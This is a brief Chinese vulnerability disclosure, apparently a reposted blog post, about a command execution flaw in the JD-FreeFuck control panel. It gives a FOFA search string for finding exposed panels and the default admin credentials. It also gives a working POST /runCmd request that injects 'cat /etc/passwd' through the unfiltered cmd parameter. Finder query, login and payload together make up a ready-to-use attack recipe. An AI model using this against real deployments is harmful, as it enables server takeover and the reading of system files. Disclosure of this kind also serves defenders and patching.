当前位置：网站首页>JD-FreeFuck 京东薅羊毛控制面板后台命令执行漏洞

JD-FreeFuck 京东薅羊毛控制面板后台命令执行漏洞

2022-04-23 18:04:00 【孤桜懶契】

漏洞描述

i JD-FreeFuck 存在后台命令执行漏洞，由于传参执行命令时没有对内容过滤，导致可以执行任意命令，控制服务器项目地址： https://github.com/meselson/JD-FreeFuck

漏洞影响

s JD-FreeFuck

空间测绘

d FOFA：title="京东薅羊毛控制面板"

漏洞复现

访问后登录页面如下

默认账号useradmin/supermanito

POST /runCmd HTTP/1.1

cmd=bash+jd.sh+%3Bcat /etc/passwd%3B+now&delay=500

个人博客

孤桜懶契：https://gylq.gitee.io/time

版权声明
本文为[孤桜懶契]所创，转载请带上原文链接，感谢
https://blog.csdn.net/qq_35938621/article/details/124356729

边栏推荐

猜你喜欢

随机推荐